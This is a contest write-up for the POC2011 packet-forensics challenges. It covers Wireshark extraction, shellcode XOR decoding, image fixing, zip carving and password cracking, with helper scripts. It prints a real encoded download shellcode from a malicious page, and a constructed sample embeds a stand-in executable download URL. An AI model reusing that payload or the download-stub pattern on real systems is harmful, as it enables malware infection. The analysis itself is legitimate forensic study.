POC2011 - "Power of Community" 이민우 (lwmr) pmskylove@gmail.com
L_01 Q: Jiseong was doing some home shopping, landed on a strange page and got infected with malware! Find the URL that the shellcode embedded in the malicious script downloads.

Following the hint "2mart" from Twitter, I used Wireshark's File -> Export -> Objects -> HTTP to save the Shop object. Opening it in Notepad shows the malicious code:

payload = '%u5858%u5858%u10eb%u4b5b%uc933%ub966%u03b8%u3480%ubd0b%ufae2%u05eb%uebe8%uffff%u54ff%ubea3%ubdbd%ud9e2%u8d1c%ubdbd%u36bd%ub1fd%ucd36%u10a1%ud536%u36b5%ud74a%ue4ac%u0355%ubdbf%u2dbd%u455f%u8ed5%ubd8f%ud5bd%ucee8%ucfd8%u36E9%uB1FB%u0355%uBDBC%u36BD%uD755%uE4B8%u2355%uBDBF%u5FBD%uD544%uD3D2%uBDBD%uC8D5%uD1CF%uE9D0%uAB42%u7D38%uAEC8%uD2D5%uBDD3%uD5BD%uCFC8%uD0D1%u36E9%uB1FB%u3355%uBDBC%u36BD%uD755%uE4BC%uD355%uBDBF%u5FBD%uD544%u8ED1%uBD8F%uCED5%uD8D5%uE9D1%uFB36%u55B1%uBCD2%uBDBD%u5536%uBCD7%u55E4%uBFF2%uBDBD%u445F%u513C%uBCBD%uBDBD%u6136%u7E3C%uBD3D%uBDBD%uBDD7%uA7D7%ud7ee%u42bd%ue1eb%u7d8e%u3dfd%ube81%uc8bd%u7a44%ubeb9%udbe1%ud893%uf97a%ub9be%ud8c5%ubdbd%u748e%uecec%ueaee%u8eec%u367d%ue5fb%u9f55%ubdbc%u3ebd%ubd45%u1e54%ubdbd%u2dbd%ubdd7%ubdd7%ubed7%ubdd7%ubfd7%ubdd5%ubdbd%ueE7D%uFB36%u5599%uBCBC%uBDBD%uFB34%uD7DD%uEDBD%uEB42%u3495%uD9FB%uFB36%uD7DD%uD7BD%uD7BD%uD7BD%uD7B9%uEDBD%uEB42%uD791%uD7BD%uD7BD%uD5BD%uBDA2%uBDB2%u42ED%u81EB%uFB34%u36C5%uD9F3%uC13D%u42B5%uC909%u3DB1%uB5C1%uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B%uBDBD%u7ABD%uCDFB%uBDBD%uBDBD%uFB7A%uBDC9%uBDBD%uD7BD%uD7BD%uD7BD%u36BD%uDDFB%u42ED%u85EB%u3B36%uBD3D%ubdbd%ubdd7%uf330%uecc9%ucb42%uedcd%ucb42%u42dd%u8deb%ucb42%u42dd%u89eb%ucb42%u42c5%ufdeb%u4636%u7d8e%u668e%u513c%ubfbd%ubdbd%u7136%u453e%uc0e9%u34b5%ubca1%u7d3e%u56b9%u364e%u3671%u3e64%uad7e%u7d8e%ueced%uedee%ueded%ueded%ueaed%ueded%ueb42%u36b5%ue9c3%uad55%ubdbc%u55bd%ubdd8%ubdbd%udeD5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB%u9955%uBDBD%u34BD%u81FB%u1CD9%uBDB9%uBDBD%u1D30%u42DD%u4242%uD8D7%uCB42%u3681%uADFB%uB555%uBDBD%u8EBD%uee66%ueeee%u42ee%u3d6d%u5585%u853d%uc854%u3cac%ub8c5%u2d2d%u2d2d%ub5c9%u4236%u36e8%u3051%ub8fd%u5d42%u1b55%ubdbd%u7ebd%u1d55%ubdbd%u05bd%ubcac%u3db9%ub17f%u55bd%ubd2e%ubdbd%u513c%ubcbd%ubdbd%u4136%u7a3e%u7ab9%u8fbA%u2CC9%u7AB1%uB9FA%u34DE%uF26C%uFA7A%u1DB5%u2AD8%u7A76%uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A84%uA9FA%uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uFA7A%u259D%uADB7%uD945%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4B9%uE955%uBDBD%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%u55BB%u42E8%u4242%u5536%uB8D7%u55E4%uBD88%uBDBD%u445F%u428E%u42EA%uB9EB%uBF56%u7EE5%u4455%u4242%uE642%uBA7B%u3405%uBCE2%u7ADB%uB8FA%u5D42%uEE7E%u6136%uD7EE%uD5FD%uADBD%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8%uC936%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%uBE10%u8e78%ub266%uad03%u6b87%ub5c9%u767c%ubeba%ufd67%u4c56%ua286%u5ac8%u36e3%u99e3%u60be%u36db%uf6b1%ue336%ubea1%u3660%u36b9%u78be%ue316%u7ee4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%uA376%uD919%u2E52%u598F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230%uEAC9%uB0DB%uFE42%u1103%uC066%u184D%uEF27%u1A43%u8367%u0BA0%u0584%u69d4%u03a6%udbc2%u411d%u8a14%u2510%uadb7%u3d45%u126b%u4627%ua8ee%ud5db%uc9c9%u87cd%u9292%ucaca%u93ca%uc5c9%uf7da%u93f7%ud2de%u92d0%ud0d4%udadc%uced8%uce92%ud893%ud8c5%ubdbd%ubdbd%ueaea%ueaea%ueaea%ueaea';

I used Malzilla. Since it is a malware hunting tool it was well suited to this problem, and I already knew how to use it because I had won a prize with it at the KISA open-source tool discovery contest and had also used it to solve a problem at ISEC2011, so this one was easy to solve.
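The same analysis done with a script instead of Malzilla, as an added example that is not part of the original write-up. It converts the %uXXXX escapes into the bytes they occupy in memory (each escape is one UTF-16LE code unit, so the low byte comes first, and whitespace left over from line wrapping is ignored), recovers the single-byte XOR key two ways (by brute-forcing all 256 keys against a known plaintext such as "http", which is what the tool's key search does, and by reading the immediate of the `xor byte ptr [ebx+ecx], imm8` instruction, 80 34 0B xx, in the decoder prologue; for the 27-byte prologue at the head of the payload quoted above that immediate is 0xbd), then pulls the URL out of the decoded bytes. The input is a constructed sample: the prologue is copied from the payload above, but the body that follows it, including the dl.example.com URL, is made up here and is not from the capture.

```python
import re
import struct

# Decoder prologue copied from the head of the payload quoted above (its first
# 27 bytes after %u -> byte conversion). Disassembled for x86:
#   58 58 58 58             pop eax (x4)
#   eb 10                   jmp short +0x10   -> to the call below
#   5b / 4b                 pop ebx ; dec ebx -> ebx = address of the encoded body
#   33 c9 / 66 b9 b8 03     xor ecx,ecx ; mov cx,0x3b8  (body length)
#   80 34 0b bd             xor byte ptr [ebx+ecx], 0xbd  <- the key is the immediate
#   e2 fa                   loop
#   eb 05 / e8 eb ff ff ff  jmp ; call back to the pop ebx (pushes the body address)
STUB = bytes.fromhex("58585858eb105b4b33c966b9b80380340bbde2faeb05e8ebffffff")
KEY_FOR_SAMPLE = 0xBD


def unicode_escapes_to_bytes(payload: str) -> bytes:
    """Turn a JavaScript '%uXXXX%uXXXX...' string into the bytes it occupies in
    memory. Each escape is one UTF-16LE code unit, so %u10eb becomes eb 10 (low
    byte first); quotes and stray whitespace in the text are simply skipped."""
    out = bytearray()
    for word in re.findall(r"%u([0-9a-fA-F]{4})", payload):
        out += struct.pack("<H", int(word, 16))
    return bytes(out)


def bytes_to_unicode_escapes(data: bytes) -> str:
    """Inverse of the above; used here only to build the constructed sample."""
    assert len(data) % 2 == 0, "need an even number of bytes"
    return "".join("%%u%02x%02x" % (data[i + 1], data[i]) for i in range(0, len(data), 2))


def key_from_xor_stub(sc: bytes):
    """Read the key straight out of an '80 34 0b imm8' decoder loop
    (xor byte ptr [ebx+ecx], imm8); None if no such instruction is present."""
    i = sc.find(b"\x80\x34\x0b")
    return sc[i + 3] if 0 <= i and i + 3 < len(sc) else None


def xor_decode(sc: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in sc)


def find_xor_keys_by_crib(sc: bytes, crib: bytes) -> list:
    """Brute-force all 256 single-byte keys and keep those under which the crib
    (a string the plaintext must contain, e.g. b'http') shows up."""
    return [k for k in range(256) if crib in xor_decode(sc, k)]


def extract_urls(decoded: bytes) -> list:
    """Printable runs starting with http:// or https://; a NUL terminator ends them."""
    return [m.decode() for m in re.findall(rb"https?://[\x21-\x7e]+", decoded)]


def analyze(payload: str, crib: bytes = b"http") -> dict:
    sc = unicode_escapes_to_bytes(payload)
    stub_key = key_from_xor_stub(sc)
    crib_keys = find_xor_keys_by_crib(sc, crib)
    key = stub_key if stub_key is not None else (crib_keys[0] if crib_keys else None)
    urls = extract_urls(xor_decode(sc, key)) if key is not None else []
    return {"stub_key": stub_key, "crib_keys": crib_keys, "urls": urls}


# Constructed sample (NOT from the capture): the prologue above followed by a
# body that opens like many Windows shellcodes (pop edi; mov eax, fs:[0x30]),
# some padding and a dummy download URL, XORed with 0xbd as the prologue expects.
_PLAIN_BODY = bytes.fromhex("5f64a130000000") + b"\x00" * 8 + b"http://dl.example.com/s.exe\x00"
SAMPLE_PAYLOAD = bytes_to_unicode_escapes(STUB + xor_decode(_PLAIN_BODY, KEY_FOR_SAMPLE))

if __name__ == "__main__":
    print(analyze(SAMPLE_PAYLOAD))
```

On a real sample, XOR only the range the prologue's registers cover (here ebx+1 for 0x3b8 bytes) rather than the whole buffer, and treat a crib hit that disagrees with the stub's immediate as a sign of a second decoding layer.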
First, converting the payload to hex gives the hex values shown in the figure below. Copying those hex values in with Paste as hex gives what is shown in the next figure.

Since the problem asks for a URL, I first tried "www" as the search string; that produced the key 2f, which did not work. With "http" the key came out as 92, and XORing with that key revealed the URL at the very bottom.

L_03 Q: When Chak-i connected to the POC site, what was the web server's time?

Using Wireshark's File -> Export -> Objects -> HTTP, I located packet number 15 for the Powerofcommunity.net site and did Follow TCP Stream, which shows
the key value Mon, 17 Oct 2011 09:24:22 GMT (this is the Date: header of the server's HTTP response, i.e. the web server's own clock).

M_01 Q: Find the starting point of the route to GRAN PLAZA. Once you complete the map you will be able to find the route. The answer is the name of the building at the starting point.

After using Wireshark's File -> Export -> Objects -> HTTP -> Save All to pull out just the map images, I assembled the map puzzle, which showed that the starting point for GRAN PLAZA is Clinica dental Dr. Calvo.

M_03 Q: Oh no, the city has been flipped over!!! Put this city back the way it was!

After using Wireshark's File -> Export -> Objects -> HTTP -> Save All to extract the flipped house images,
I looked at them and saw that it was a problem of reversing the hex values. I had seen this kind of problem before, and there was a similar one at the recent Soonchunhyang University Information Security Festival, so with the slightly messy source code I had used there I solved it easily, if laboriously. The program reads a text hex dump of one image ("XX XX XX ...", one byte per three characters), swaps the two hex digits of every byte, and writes the result out:

    #include <stdio.h>
    #include <string.h>

    int main(void)
    {
        size_t i = 0;
        char str1[100000] = {0};      /* whole hex-text dump of one image */
        char temp;
        char *str1_ptr = str1;
        FILE *fp = NULL;
        FILE *fp2 = NULL;
        size_t n_size = 0;
        size_t total_size = 0;
        char buff[1024] = {0};

        fp = fopen("c:\\users\\lwmr\\desktop\\a.txt", "r");
        if (fp == NULL) {
            printf("failed to open file\n");
            return 1;
        }
        /* read the whole dump into str1, refusing input larger than the buffer */
        while (0 < (n_size = fread(buff, sizeof(char), 1024, fp))) {
            if (total_size + n_size > sizeof(str1)) {
                printf("input too large\n");
                fclose(fp);
                return 1;
            }
            memcpy(str1_ptr, buff, n_size);
            str1_ptr += n_size;
            total_size += n_size;
        }
        fclose(fp);

        /* dump is "XX XX XX ...": swap the two hex digits of each byte;
           the stride of 3 steps over the separating space */
        for (i = 0; i + 1 < total_size; i += 3) {
            temp = str1[i];
            str1[i] = str1[i + 1];
            str1[i + 1] = temp;
        }
        if (total_size > 0)
            printf("total_size = %zu, str1[total_size-1] = %c\n", total_size, str1[total_size - 1]);

        fp2 = fopen("c:\\users\\lwmr\\desktop\\output2.txt", "w");
        if (fp2 == NULL) {
            printf("failed to open output file\n");
            return 1;
        }
        fwrite(str1, sizeof(char), total_size, fp2);
        fclose(fp2);
        return 0;
    }

After processing each image this way and combining the images, the key is visible.
M_04 Q: Can you do some arithmetic?

Saving the kkk.jpg file via Wireshark's File -> Export -> Objects -> HTTP shows an addition problem in an image file like the one below. The digits were hard to make out and I kept getting the sum wrong, so I adjusted the image in Photoshop as shown and then worked it out: key : 7658

H_03 Q: A Cisco router at the Hack The Packet contest has been hacked.

Knowing that a router uses TFTP, a connectionless file transfer protocol, to fetch its configuration file and IOS image, I listed the packets in the capture that use the TFTP protocol, shown below. Following the UDP stream of each of the five packets that appeared showed that every one of them contained the key value.
H_04 Q: Buddy Buddy, zip file

There were three packets in the capture corresponding to buddybuddy, but I could not extract the zip file from them, so I opened the problem pcap in a hex editor and searched for the zip signature PK (50 4B 03, the start of the 50 4B 03 04 local file header). Among the many PK strings, one had KEY right below the PK; carving out that region produces a zip archive, but it is password protected. Cracking it with AAPR v4.53 produced the password in just 0.5 seconds: 1018. Entering that password, extracting the archive and reading the key file gives Key:YOU_Don'T_Know_ME
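Carving the archive out of the raw bytes with a script rather than by hand in a hex editor, as an added example that is not part of the original write-up. It scans a byte blob for the 50 4B 03 04 local file header, takes everything up to the matching end-of-central-directory record (so plain "PK" text and stray PK 01 02 signatures are skipped), parses the local headers to find the member whose name contains KEY and to report the encryption flag (bit 0 of the general-purpose flags; the contest archive would show it set, and read_entry would then need pwd=b"1018"), and reads the member with the standard library. The input is a constructed stand-in for the pcap, junk with decoy PK strings around one unencrypted zip, not the contest capture, and the key text inside it is a placeholder.

```python
import io
import struct
import zipfile

LOCAL_FILE_HDR = b"PK\x03\x04"   # 50 4B 03 04: start of every zip member
EOCD_SIG = b"PK\x05\x06"         # end-of-central-directory record: 22 bytes + comment


def carve_zips(blob: bytes) -> list:
    """Slice out every [local file header ... EOCD] span found in an arbitrary blob.

    Only a 50 4B 03 04 that is followed later by an EOCD record counts; the
    EOCD's comment length (offset 20) decides where the archive really ends."""
    archives, pos = [], 0
    while True:
        start = blob.find(LOCAL_FILE_HDR, pos)
        if start < 0:
            break
        end = blob.find(EOCD_SIG, start)
        if end < 0 or end + 22 > len(blob):
            break
        comment_len = struct.unpack_from("<H", blob, end + 20)[0]
        stop = end + 22 + comment_len
        archives.append(blob[start:stop])
        pos = stop
    return archives


def local_entries(archive: bytes) -> list:
    """Walk the local file headers: [(name, is_encrypted, compressed_size), ...].

    Bit 0 of the general-purpose flags marks traditional PKWARE (ZipCrypto)
    encryption, i.e. a password-protected member."""
    entries, pos = [], 0
    while True:
        pos = archive.find(LOCAL_FILE_HDR, pos)
        if pos < 0 or pos + 30 > len(archive):
            break
        (_sig, _ver, flags, _method, _mtime, _mdate, _crc,
         csize, _usize, name_len, extra_len) = struct.unpack_from("<4sHHHHHIIIHH", archive, pos)
        name = archive[pos + 30:pos + 30 + name_len].decode("utf-8", "replace")
        entries.append((name, bool(flags & 0x0001), csize))
        # Bit 3 set means the sizes live in a trailing data descriptor and csize
        # may be 0; then just resume the signature scan after this header.
        pos += (30 + name_len + extra_len + csize) if csize else 4
    return entries


def find_archive_with(blob: bytes, wanted: str):
    """First carved archive that has a member whose name contains `wanted`."""
    for archive in carve_zips(blob):
        if any(wanted in name for name, _enc, _size in local_entries(archive)):
            return archive
    return None


def read_entry(archive: bytes, name: str, pwd: bytes = None) -> bytes:
    """Extract one member; pass pwd (e.g. b'1018') when is_encrypted is True."""
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        return zf.read(name, pwd=pwd)


def build_sample_blob() -> bytes:
    """Constructed stand-in for the pcap: junk with decoy 'PK' strings around one zip."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("KEY.txt", "Key:CONSTRUCTED_SAMPLE\n")
    return (b"\x00" * 64 + b"HTTP/1.1 200 OK\r\nPK here is just text\r\n"
            + buf.getvalue() + b"PK\x01\x02 stray signature" + b"\xff" * 32)


if __name__ == "__main__":
    blob = build_sample_blob()
    hit = find_archive_with(blob, "KEY")
    print(local_entries(hit))
    print(read_entry(hit, "KEY.txt"))
```

If the archive was split across several packets, carve from the reassembled stream (Follow TCP Stream, then Save As in raw mode) rather than from the raw pcap, since packet headers would otherwise sit inside the slice.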